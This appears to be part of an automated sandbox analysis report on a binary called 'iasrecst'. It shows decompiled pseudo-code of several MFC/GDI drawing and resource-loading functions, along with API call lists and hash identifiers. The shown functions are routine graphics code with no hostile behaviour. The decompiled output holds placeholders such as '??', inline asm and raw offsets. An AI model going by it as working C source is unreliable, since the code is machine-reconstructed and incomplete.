SetWindowLongA.USER32 ref: 00413B3C

Strings

AfxOldWndProc423, xrefs: 00413B7D, 00413B82, 00413B8D, 00413B95, 00413B9E
ime, xrefs: 00413AA2

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
String ID: AfxOldWndProc423$ime
API String ID: 3731301195-104836986
Opcode ID: 104baf9216110bbdc268fec6f28eb3b5a99cf74ba741684ded7b0cecb0923a70
Instruction ID: e36065fefe0489718c47fffdee2bb39183bb531f2b2dfd07b326dd1187a37919
Opcode Fuzzy Hash: 104baf9216110bbdc268fec6f28eb3b5a99cf74ba741684ded7b0cecb0923a70
Instruction Fuzzy Hash: C951C531604215ABCF21AF25DC48B9F7BA8FF04762F104525F916A7292D738EE81CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00423C5A, Relevance: 28.8, APIs: 19, Instructions: 266
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00423C5A(intOrPtr* __ecx, void* __eflags) {
				void* _t146;
				void* _t150;
				void* _t159;
				void* _t165;
				intOrPtr* _t246;
				RECT* _t250;
				void* _t255;

				E00406520(E0042AAB8, _t255);
				_t246 = __ecx;
				E00405556(_t255 - 0x2c);
				 *(_t255 - 0x2c) = 0x42f0f0;
				 *((intOrPtr*)(_t255 - 4)) = 0;
				E00405556(_t255 - 0x1c);
				 *(_t255 - 0x1c) = 0x42f0f0;
				 *((char*)(_t255 - 4)) = 1;
				E00405556(_t255 - 0x14);
				 *(_t255 - 0x14) = 0x42f0f0;
				 *((char*)(_t255 - 4)) = 2;
				E0041A611(_t255 - 0x1c, CreateRectRgnIndirect( *(_t255 + 8)));
				CopyRect(_t255 - 0x44,  *(_t255 + 8));
				InflateRect(_t255 - 0x44,  ~( *(_t255 + 0xc)),  ~( *(_t255 + 0x10)));
				IntersectRect(_t255 - 0x44, _t255 - 0x44,  *(_t255 + 8));
				E0041A611(_t255 - 0x14, CreateRectRgnIndirect(_t255 - 0x44));
				E0041A611(_t255 - 0x2c, CreateRectRgn(0, 0, 0, 0));
				asm("sbb eax, eax");
				asm("sbb ecx, ecx");
				CombineRgn( *(_t255 - 0x28),  ~(_t255 - 0x1c) &  *(_t255 - 0x18),  ~(_t255 - 0x14) &  *(_t255 - 0x10), 3);
				_t261 =  *((intOrPtr*)(_t255 + 0x20));
				if( *((intOrPtr*)(_t255 + 0x20)) == 0) {
					 *((intOrPtr*)(_t255 + 0x20)) = E00423BE7(_t261);
				}
				if( *((intOrPtr*)(_t255 + 0x24)) == 0) {
					 *((intOrPtr*)(_t255 + 0x24)) =  *((intOrPtr*)(_t255 + 0x20));
				}
				E00405556(_t255 - 0x24);
				 *(_t255 - 0x24) = 0x42f0f0;
				 *((char*)(_t255 - 4)) = 3;
				E00405556(_t255 - 0x34);
				 *((intOrPtr*)(_t255 - 0x34)) = 0x42f0f0;
				_t250 =  *(_t255 + 0x14);
				 *((char*)(_t255 - 4)) = 4;
				if(_t250 != 0) {
					E0041A611(_t255 - 0x24, CreateRectRgn(0, 0, 0, 0));
					SetRectRgn( *(_t255 - 0x18),  *_t250, _t250->top, _t250->right, _t250->bottom);
					CopyRect(_t255 - 0x44, _t250);
					InflateRect(_t255 - 0x44,  ~( *(_t255 + 0x18)),  ~( *(_t255 + 0x1c)));
					IntersectRect(_t255 - 0x44, _t255 - 0x44, _t250);
					SetRectRgn( *(_t255 - 0x10),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c),  *(_t255 - 0x38));
					asm("sbb eax, eax");
					asm("sbb ecx, ecx");
					CombineRgn( *(_t255 - 0x20),  ~(_t255 - 0x1c) &  *(_t255 - 0x18),  ~(_t255 - 0x14) &  *(_t255 - 0x10), 3);
					if( *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x24)) + 4))) {
						E0041A611(_t255 - 0x34, CreateRectRgn(0, 0, 0, 0));
						asm("sbb eax, eax");
						asm("sbb ecx, ecx");
						CombineRgn( *(_t255 - 0x30),  ~(_t255 - 0x24) &  *(_t255 - 0x20),  ~(_t255 - 0x2c) &  *(_t255 - 0x28), 3);
					}
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x24)) + 4)) && _t250 != 0) {
					E0041A0FB(_t246, _t255 - 0x24);
					 *((intOrPtr*)( *_t246 + 0x50))(_t255 - 0x44);
					_t165 = E00419D35(_t246,  *((intOrPtr*)(_t255 + 0x24)));
					PatBlt( *(_t246 + 4),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c) -  *(_t255 - 0x44),  *(_t255 - 0x38) -  *(_t255 - 0x40), 0x5a0049);
					E00419D35(_t246, _t165);
				}
				_t146 = _t255 - 0x34;
				if( *(_t255 - 0x30) == 0) {
					_t146 = _t255 - 0x2c;
				}
				E0041A0FB(_t246, _t146);
				 *((intOrPtr*)( *_t246 + 0x50))(_t255 - 0x44);
				_t150 = E00419D35(_t246,  *((intOrPtr*)(_t255 + 0x20)));
				_t251 = _t150;
				PatBlt( *(_t246 + 4),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c) -  *(_t255 - 0x44),  *(_t255 - 0x38) -  *(_t255 - 0x40), 0x5a0049);
				if(_t150 != 0) {
					E00419D35(_t246, _t251);
				}
				E0041A0FB(_t246, 0);
				 *((intOrPtr*)(_t255 - 0x34)) = 0x42cb14;
				 *((char*)(_t255 - 4)) = 5;
				E0041A668(_t255 - 0x34);
				 *(_t255 - 0x24) = 0x42cb14;
				 *((char*)(_t255 - 4)) = 6;
				E0041A668(_t255 - 0x24);
				 *(_t255 - 0x14) = 0x42cb14;
				 *((char*)(_t255 - 4)) = 7;
				E0041A668(_t255 - 0x14);
				 *(_t255 - 0x1c) = 0x42cb14;
				 *((char*)(_t255 - 4)) = 8;
				E0041A668(_t255 - 0x1c);
				 *(_t255 - 0x2c) = 0x42cb14;
				 *((intOrPtr*)(_t255 - 4)) = 9;
				_t159 = E0041A668(_t255 - 0x2c);
				 *[fs:0x0] =  *((intOrPtr*)(_t255 - 0xc));
				return _t159;
			}

APIs

__EH_prolog.LIBCMT ref: 00423C5F
CreateRectRgnIndirect.GDI32(?), ref: 00423CA2
CopyRect.USER32 ref: 00423CB8
InflateRect.USER32(?,?,?), ref: 00423CCE
IntersectRect.USER32 ref: 00423CDF
CreateRectRgnIndirect.GDI32(?), ref: 00423CE9
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00423CFC
CombineRgn.GDI32(?,?,?,00000003), ref: 00423D26
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00423D71
SetRectRgn.GDI32(?,?,?,?,?), ref: 00423D8E
CopyRect.USER32 ref: 00423D99
InflateRect.USER32(?,?,?), ref: 00423DAF
IntersectRect.USER32 ref: 00423DBE
SetRectRgn.GDI32(?,?,?,?,?), ref: 00423DD3
CombineRgn.GDI32(?,?,?,00000003), ref: 00423DF4
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00423E0C
CombineRgn.GDI32(?,?,?,00000003), ref: 00423E36

Part of subcall function 00423BE7: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,004200A6), ref: 00423C26
Part of subcall function 00423BE7: CreatePatternBrush.GDI32(00000000), ref: 00423C33
Part of subcall function 00423BE7: DeleteObject.GDI32(00000000), ref: 00423C3F

Part of subcall function 0041A0FB: SelectClipRgn.GDI32(?,00000000), ref: 0041A11D
Part of subcall function 0041A0FB: SelectClipRgn.GDI32(?,?), ref: 0041A133

Part of subcall function 00419D35: SelectObject.GDI32(?,00000000), ref: 00419D57
Part of subcall function 00419D35: SelectObject.GDI32(?,?), ref: 00419D6D

PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00423E8C
PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00423EE0

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Rect$Create$Select$CombineObject$ClipCopyIndirectInflateIntersect$BitmapBrushDeleteH_prologPattern
String ID:
API String ID: 4023391435-0
Opcode ID: 7749715586c1636e3187dfbc3d35a0f18f947e078070156eb7c5ca2835c41bba
Instruction ID: ab3a66f40d2d04ee3edfb297914df431d927688ea4f6a4c6808893f8cc49b6d9
Opcode Fuzzy Hash: 7749715586c1636e3187dfbc3d35a0f18f947e078070156eb7c5ca2835c41bba
Instruction Fuzzy Hash: A4A146B2A00119EFCF05EFA4DD95DEEBBB9EF08304F14411AF506A2250DB38AE55CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00428C35, Relevance: 25.6, APIs: 17, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00428C35(intOrPtr* __ecx) {
				void* _t19;
				void* _t46;
				void* _t64;

				if( *(__ecx + 4) != 0) {
					_t64 = SelectObject( *(__ecx + 8), GetStockObject(7));
					SelectObject( *(__ecx + 8), _t64);
					SelectObject( *(__ecx + 4), _t64);
					_t46 = SelectObject( *(__ecx + 8), GetStockObject(4));
					SelectObject( *(__ecx + 8), _t46);
					SelectObject( *(__ecx + 4), _t46);
					E00419E06(__ecx, GetROP2( *(__ecx + 8)));
					E00419DAA(__ecx, GetBkMode( *(__ecx + 8)));
					E0041A240(__ecx, GetTextAlign( *(__ecx + 8)));
					E00419DD8(__ecx, GetPolyFillMode( *(__ecx + 8)));
					E00419E34(__ecx, GetStretchBltMode( *(__ecx + 8)));
					_push(GetNearestColor( *(__ecx + 8), GetTextColor( *(__ecx + 8))));
					 *((intOrPtr*)( *__ecx + 0x30))();
					_push(GetNearestColor( *(__ecx + 8), GetBkColor( *(__ecx + 8))));
					return  *((intOrPtr*)( *__ecx + 0x2c))();
				}
				return _t19;
			}

0x00428c3c
0x00428c5b
0x00428c61
0x00428c67
0x00428c73
0x00428c79
0x00428c7f
0x00428c8d
0x00428c9e
0x00428caf
0x00428cc0
0x00428cd1
0x00428ced
0x00428cf0
0x00428d04
0x00000000
0x00428d0c
0x00428d0e

APIs

GetStockObject.GDI32(00000007), ref: 00428C4D
SelectObject.GDI32(00000000,00000000), ref: 00428C59
SelectObject.GDI32(00000000,00000000), ref: 00428C61
SelectObject.GDI32(00000000,00000000), ref: 00428C67
GetStockObject.GDI32(00000004), ref: 00428C6B
SelectObject.GDI32(00000000,00000000), ref: 00428C71
SelectObject.GDI32(00000000,00000000), ref: 00428C79
SelectObject.GDI32(00000000,00000000), ref: 00428C7F
GetROP2.GDI32(00000000), ref: 00428C84

Part of subcall function 00419E06: SetROP2.GDI32(?,?), ref: 00419E1F
Part of subcall function 00419E06: SetROP2.GDI32(?,?), ref: 00419E2D

GetBkMode.GDI32(00000000,?,?,?,?,00428AF9,00000000), ref: 00428C95

Part of subcall function 00419DAA: SetBkMode.GDI32(?,?), ref: 00419DC3
Part of subcall function 00419DAA: SetBkMode.GDI32(?,?), ref: 00419DD1

GetTextAlign.GDI32(00000000), ref: 00428CA6

Part of subcall function 0041A240: SetTextAlign.GDI32(?,?), ref: 0041A25B
Part of subcall function 0041A240: SetTextAlign.GDI32(?,?), ref: 0041A269

GetPolyFillMode.GDI32(00000000,?,?,?,?,00428AF9,00000000), ref: 00428CB7

Part of subcall function 00419DD8: SetPolyFillMode.GDI32(?,?), ref: 00419DF1
Part of subcall function 00419DD8: SetPolyFillMode.GDI32(?,?), ref: 00419DFF

GetStretchBltMode.GDI32(00000000,?,?,?,?,00428AF9,00000000), ref: 00428CC8

Part of subcall function 00419E34: SetStretchBltMode.GDI32(?,?), ref: 00419E4D
Part of subcall function 00419E34: SetStretchBltMode.GDI32(?,?), ref: 00419E5B

GetTextColor.GDI32(00000000), ref: 00428CD9
GetNearestColor.GDI32(00000000,00000000,?,?,?,?,00428AF9,00000000), ref: 00428CE9
GetBkColor.GDI32(00000000), ref: 00428CF6
GetNearestColor.GDI32(00000000,00000000,?,?,?,?,00428AF9,00000000), ref: 00428D00

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Mode$Object$Select$ColorText$AlignFillPolyStretch$NearestStock
String ID:
API String ID: 1751264856-0
Opcode ID: 7e84bd095403a9cafc71df7c238300e6e44354511f5331b7d2290ac7b338bee2
Instruction ID: b09d1b0ebf0f207bae19d4c81b9403c04553573e303ad89ba419e4ec13758243
Opcode Fuzzy Hash: 7e84bd095403a9cafc71df7c238300e6e44354511f5331b7d2290ac7b338bee2
Instruction Fuzzy Hash: 76214171200915AFC7227B66DC19D2FBBAEFF887407014429F55A82570CB35ACA29F98

Uniqueness

Uniqueness Score: -1.00%

Function 00427432, Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 332
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00427432(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* _t171;
				struct HDC__* _t188;
				intOrPtr* _t192;
				intOrPtr _t203;
				struct HBRUSH__* _t239;
				intOrPtr* _t244;
				signed int* _t276;
				intOrPtr* _t281;
				intOrPtr _t301;
				intOrPtr _t317;
				intOrPtr* _t339;
				intOrPtr _t342;
				intOrPtr _t343;
				int* _t351;
				intOrPtr* _t352;
				int _t353;
				void* _t355;

				_t171 = E00406520(E0042A17C, _t355);
				_t281 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x70)) == 0 ||  *((intOrPtr*)(__ecx + 0x7c)) == 0) {
					L22:
					 *[fs:0x0] =  *((intOrPtr*)(_t355 - 0xc));
					return _t171;
				} else {
					_t339 =  *((intOrPtr*)(_t355 + 8));
					GetViewportOrgEx( *(_t339 + 8), _t355 - 0x24);
					 *((intOrPtr*)(_t355 - 0x38)) = 0;
					 *(_t355 - 0x2c) =  *(_t355 - 0x24);
					 *(_t355 - 0x28) =  *(_t355 - 0x20);
					 *((intOrPtr*)(_t355 - 0x3c)) = 0x42cb24;
					 *(_t355 - 4) = 0;
					E0041A611(_t355 - 0x3c, CreatePen(0, 2, GetSysColor(6)));
					 *(_t355 - 0x30) =  *(_t355 - 0x30) & 0x00000000;
					 *((intOrPtr*)(_t355 - 0x34)) = 0x42cb24;
					 *(_t355 - 4) = 1;
					E0041A611(_t355 - 0x34, CreatePen(0, 3, GetSysColor(0x10)));
					 *((intOrPtr*)(_t355 - 0x10)) = 0;
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x114)) + 0x10)) = 1;
					if( *((intOrPtr*)(_t281 + 0xf8)) <= 0) {
						L21:
						E0041A668(_t355 - 0x3c);
						E0041A668(_t355 - 0x34);
						 *((intOrPtr*)(_t355 - 0x34)) = 0x42cb14;
						 *(_t355 - 4) = 2;
						E0041A668(_t355 - 0x34);
						 *((intOrPtr*)(_t355 - 0x3c)) = 0x42cb14;
						 *(_t355 - 4) = 3;
						_t171 = E0041A668(_t355 - 0x3c);
						goto L22;
					} else {
						 *((intOrPtr*)(_t355 - 0x14)) = 0;
						while(1) {
							 *((intOrPtr*)(_t355 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x1c))();
							if(_t339 != 0) {
								_t188 =  *(_t339 + 4);
							} else {
								_t188 = 0;
							}
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x10))(_t188);
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x114)) + 0x14)) =  *((intOrPtr*)(_t281 + 0xf4)) +  *((intOrPtr*)(_t355 - 0x10));
							_t192 =  *((intOrPtr*)(_t281 + 0x114));
							if( *((intOrPtr*)(_t281 + 0xf4)) +  *((intOrPtr*)(_t355 - 0x10)) <= ( *( *((intOrPtr*)( *_t192 + 0x5c)) + 0x1e) & 0x0000ffff)) {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x70)))) + 0xdc))( *((intOrPtr*)(_t281 + 0x74)), _t192);
							}
							 *(_t355 - 0x1c) = GetDeviceCaps( *( *((intOrPtr*)(_t281 + 0x74)) + 8), 0xa);
							SetRect( *((intOrPtr*)(_t281 + 0x114)) + 0x24, 0, 0, GetDeviceCaps( *( *((intOrPtr*)(_t281 + 0x74)) + 8), 8),  *(_t355 - 0x1c));
							DPtoLP( *( *((intOrPtr*)(_t281 + 0x74)) + 8),  *((intOrPtr*)(_t281 + 0x114)) + 0x24, 2);
							 *((intOrPtr*)( *_t339 + 0x1c))();
							_t203 =  *((intOrPtr*)(_t281 + 0x90));
							_t301 =  *((intOrPtr*)(_t355 - 0x14));
							_t351 = _t301 + _t203;
							 *(_t355 - 0x1c) = _t351;
							if( *((intOrPtr*)(_t301 + _t203 + 0x18)) == 0) {
								 *((intOrPtr*)( *_t281 + 0x10c))( *((intOrPtr*)(_t355 - 0x10)));
								if( *((intOrPtr*)(_t281 + 0xec)) != 0) {
									_t276 = E0041AFCE(_t281, _t355 - 0x44);
									 *(_t355 - 0x2c) =  ~( *_t276);
									 *(_t355 - 0x28) =  ~(_t276[1]);
								}
							}
							 *((intOrPtr*)( *_t339 + 0x34))(1);
							 *((intOrPtr*)( *_t339 + 0x38))(_t355 - 0x4c,  *(_t355 - 0x2c),  *(_t355 - 0x28));
							E00419FFB(_t339, _t355 - 0x54, 0, 0);
							 *((intOrPtr*)( *_t339 + 0x24))(5);
							E00419D35(_t339, _t355 - 0x3c);
							Rectangle( *(_t339 + 4),  *_t351, _t351[1], _t351[2], _t351[3]);
							E00419D35(_t339, _t355 - 0x34);
							E0041A1BF(_t339, _t355 - 0x5c, _t351[2] + 1, _t351[1] + 3);
							E0041A20B(_t339, _t351[2] + 1, _t351[3] + 1);
							E0041A1BF(_t339, _t355 - 0x64,  *_t351 + 3, _t351[3] + 1);
							E0041A20B(_t339, _t351[2] + 1, _t351[3] + 1);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							 *(_t355 - 0x74) =  *(_t355 - 0x74) + 1;
							 *((intOrPtr*)(_t355 - 0x70)) =  *((intOrPtr*)(_t355 - 0x70)) + 1;
							 *((intOrPtr*)(_t355 - 0x6c)) =  *((intOrPtr*)(_t355 - 0x6c)) - 2;
							 *((intOrPtr*)(_t355 - 0x68)) =  *((intOrPtr*)(_t355 - 0x68)) - 2;
							_t239 = GetStockObject(0);
							_t352 =  *((intOrPtr*)(_t355 + 8));
							FillRect( *(_t352 + 4), _t355 - 0x74, _t239);
							 *((intOrPtr*)( *_t352 + 0x20))(0xffffffff);
							_t244 =  *((intOrPtr*)(_t281 + 0x114));
							if( *((intOrPtr*)(_t244 + 0x10)) == 0) {
								break;
							}
							_t317 =  *((intOrPtr*)(_t281 + 0xf4));
							_t342 =  *((intOrPtr*)(_t355 - 0x10));
							if(_t317 + _t342 > ( *( *((intOrPtr*)( *_t244 + 0x5c)) + 0x1e) & 0x0000ffff)) {
								L18:
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x18))();
								 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x20))( *((intOrPtr*)(_t355 - 0x18)));
								if(_t342 == 0) {
									_t249 =  *((intOrPtr*)(_t281 + 0xf4));
									if( *((intOrPtr*)(_t281 + 0xf4)) > 1) {
										E00427C71(_t281, _t249 - 1, 1);
									}
								}
								goto L21;
							}
							_t343 = _t342 + 1;
							 *((intOrPtr*)( *_t281 + 0x110))(_t317, _t343);
							_t353 =  *(_t355 - 0x1c);
							E00428B78(_t281,  *((intOrPtr*)(_t281 + 0x74)), _t343,  *((intOrPtr*)(_t353 + 0x18)),  *((intOrPtr*)(_t353 + 0x1c)));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x70))(0xd, 0, 0, _t355 - 0x24);
							E004298F1( *((intOrPtr*)(_t281 + 0x74)), _t355 - 0x24);
							 *(_t355 - 0x24) =  *(_t355 - 0x24) +  *_t353;
							 *(_t355 - 0x20) =  *(_t355 - 0x20) +  *((intOrPtr*)(_t353 + 4));
							 *(_t355 - 0x24) =  *(_t355 - 0x24) + 1;
							 *(_t355 - 0x24) =  *(_t355 - 0x24) +  *(_t355 - 0x2c);
							 *(_t355 - 0x20) =  *(_t355 - 0x20) + 1;
							 *(_t355 - 0x20) =  *(_t355 - 0x20) +  *(_t355 - 0x28);
							E00429859( *((intOrPtr*)(_t281 + 0x74)),  *(_t355 - 0x24),  *(_t355 - 0x20));
							E0042986F( *((intOrPtr*)(_t281 + 0x74)));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x70)))) + 0xfc))( *((intOrPtr*)(_t281 + 0x74)),  *((intOrPtr*)(_t281 + 0x114)));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x18))();
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x20))( *((intOrPtr*)(_t355 - 0x18)));
							 *((intOrPtr*)(_t355 - 0x14)) =  *((intOrPtr*)(_t355 - 0x14)) + 0x28;
							 *((intOrPtr*)(_t355 - 0x10)) = _t343;
							if(_t343 <  *((intOrPtr*)(_t281 + 0xf8))) {
								_t339 =  *((intOrPtr*)(_t355 + 8));
								continue;
							}
							goto L21;
						}
						_t342 =  *((intOrPtr*)(_t355 - 0x10));
						goto L18;
					}
				}
			}

APIs

__EH_prolog.LIBCMT ref: 00427437
GetViewportOrgEx.GDI32(?,?), ref: 00427462
GetSysColor.USER32(00000006), ref: 00427489
CreatePen.GDI32(00000000,00000002,00000000), ref: 00427490
GetSysColor.USER32(00000010), ref: 004274B0
CreatePen.GDI32(00000000,00000003,00000000), ref: 004274B8
GetDeviceCaps.GDI32(?,0000000A), ref: 00427556
GetDeviceCaps.GDI32(?,00000008), ref: 00427563
SetRect.USER32 ref: 00427577
DPtoLP.GDI32(?,?,00000002), ref: 0042758F
Rectangle.GDI32(00000001,776263E0,?,?,?), ref: 0042762D

Part of subcall function 00419D35: SelectObject.GDI32(?,00000000), ref: 00419D57
Part of subcall function 00419D35: SelectObject.GDI32(?,?), ref: 00419D6D

Part of subcall function 0041A1BF: MoveToEx.GDI32(?,?,?,?), ref: 0041A1E1
Part of subcall function 0041A1BF: MoveToEx.GDI32(?,?,?,?), ref: 0041A1F5

Part of subcall function 0041A20B: MoveToEx.GDI32(?,?,?,00000000), ref: 0041A225
Part of subcall function 0041A20B: LineTo.GDI32(?,?,?), ref: 0041A236

GetStockObject.GDI32(00000000), ref: 004276A4
FillRect.USER32 ref: 004276B5

Part of subcall function 004298F1: GetViewportExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 00429902
Part of subcall function 004298F1: GetWindowExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 0042990F

Part of subcall function 0042986F: GetDeviceCaps.GDI32(?,0000000A), ref: 00429884
Part of subcall function 0042986F: GetDeviceCaps.GDI32(?,00000008), ref: 0042988D
Part of subcall function 0042986F: SetMapMode.GDI32(?,00000001), ref: 004298A5
Part of subcall function 0042986F: SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 004298B3
Part of subcall function 0042986F: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 004298C3
Part of subcall function 0042986F: IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 004298DE

Strings

(, xrefs: 00427788

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CapsDevice$MoveObjectRectViewport$ColorCreateSelectWindow$ClipFillH_prologIntersectLineModeRectangleStock
String ID: (
API String ID: 14264375-3887548279
Opcode ID: 5356feb156921028ef3ddc0151e9ddf4cdc27a2cc2d9984696750f9678fc26b0
Instruction ID: c53487ea9dce1701cc3862e452b5fc9e596f4e2bded4e1f589efc21baabd4d08
Opcode Fuzzy Hash: 5356feb156921028ef3ddc0151e9ddf4cdc27a2cc2d9984696750f9678fc26b0
Instruction Fuzzy Hash: EED14970A00219DFCB15DFA4D985EAEBBB5FF48304F14406AF816AB266CB35AD41CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0041C129, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 132
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041C129(int _a4, int _a8, struct HDC__* _a12) {
				int* _v8;
				intOrPtr* _v12;
				void* _v16;
				void* _t37;
				signed int _t42;
				struct HDC__* _t49;
				struct HBITMAP__* _t50;
				intOrPtr* _t60;
				int* _t61;
				int _t66;
				signed int _t69;
				intOrPtr* _t74;
				signed int _t77;
				signed int* _t82;
				int _t83;
				struct HDC__* _t84;
				intOrPtr* _t85;

				_t37 = LoadResource(_a4, _a8);
				if(_t37 == 0) {
					L3:
					return 0;
				}
				_t60 = LockResource(_t37);
				_v12 = _t60;
				if(_t60 == 0) {
					goto L3;
				}
				_t80 =  *_t60 + 0x40;
				_t85 = E00405667( *_t60 + 0x40);
				if(_t85 != 0) {
					E00405700(_t85, _t60, _t80);
					_t82 = _t85 +  *_t85;
					_a8 = 0x10;
					do {
						_t42 =  *_t82;
						_t69 = 0;
						_t74 = 0x42dbc0;
						while(_t42 !=  *_t74) {
							_t74 = _t74 + 8;
							_t69 = _t69 + 1;
							if(_t74 < "DllGetVersion") {
								continue;
							}
							goto L13;
						}
						if(_a12 == 0) {
							_t61 = 0x42dbc4 + _t69 * 8;
							_v8 = _t61;
							GetSysColor( *(0x42dbc4 + _t69 * 8));
							GetSysColor( *_t61);
							 *_t82 = 0 << 0x00000008 | GetSysColor( *_v8) >> 0x00000010 & 0x000000ff;
						} else {
							if( *(0x42dbc4 + _t69 * 8) != 0x12) {
								 *_t82 = 0xffffff;
							}
						}
						L13:
						_t82 =  &(_t82[1]);
						_t14 =  &_a8;
						 *_t14 = _a8 - 1;
					} while ( *_t14 != 0);
					_t83 =  *(_t85 + 4);
					_t66 =  *(_t85 + 8);
					_a4 = _t83;
					_a8 = _t66;
					_t49 = GetDC(0);
					_a12 = _t49;
					_t50 = CreateCompatibleBitmap(_t49, _t83, _t66);
					_v8 = _t50;
					if(_t50 != 0) {
						_t84 = CreateCompatibleDC(_a12);
						_v16 = SelectObject(_t84, _v8);
						_push(0xcc0020);
						_push(0);
						_push(_t85);
						_t77 = 1;
						StretchDIBits(_t84, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v12 + 0x28 + (_t77 <<  *(_t85 + 0xe)) * 4, ??, ??, ??);
						SelectObject(_t84, _v16);
						DeleteDC(_t84);
					}
					ReleaseDC(0, _a12);
					E004062E0(_t85);
					return _v8;
				}
				goto L3;
			}

APIs

LoadResource.KERNEL32(00000800,?,00000800,?,00000000,?,00000800), ref: 0041C138
LockResource.KERNEL32(00000000), ref: 0041C143
GetSysColor.USER32 ref: 0041C1C5
GetSysColor.USER32(00000000), ref: 0041C1D3
GetSysColor.USER32(00000000), ref: 0041C1E3
GetDC.USER32(00000000), ref: 0041C209
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0041C215
CreateCompatibleDC.GDI32(00000000), ref: 0041C225
SelectObject.GDI32(00000000,00000000), ref: 0041C237
StretchDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00CC0020), ref: 0041C266
SelectObject.GDI32(00000000,00000000), ref: 0041C270
DeleteDC.GDI32(00000000), ref: 0041C273
ReleaseDC.USER32 ref: 0041C27E

Strings

DllGetVersion, xrefs: 0041C192

Memory Dump Source

